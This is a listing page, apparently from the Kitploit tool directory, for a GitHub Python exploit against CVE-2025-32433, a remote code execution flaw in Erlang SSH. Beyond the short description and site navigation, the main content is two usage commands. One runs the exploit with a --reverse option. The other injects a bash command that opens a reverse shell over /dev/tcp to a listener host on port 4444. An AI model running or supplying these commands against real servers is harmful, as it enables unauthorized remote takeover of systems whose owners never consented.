Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/carlosalbertotuma/cve-2025-32433
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubcarlosalbertotuma/cve-2025-32433

CVE-2025-32433

Python exploit for CVE-2025-32433 targeting Erlang SSH remote code execution with reverse shell and command execution capabilities.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
16 months agoNot yet reviewed
Share

CVE-2025-32433

python Erlang_SSH_RCE.py -t 192.168.100.123 -p 2222 --reverse 192.168.100.98 4444

python Erlang_SSH_RCE.py -t 192.168.100.123 -p 2222 -c "bash -c 'bash -i >& /dev/tcp/192.168.100.98/4444 0>&1'"

Download Tool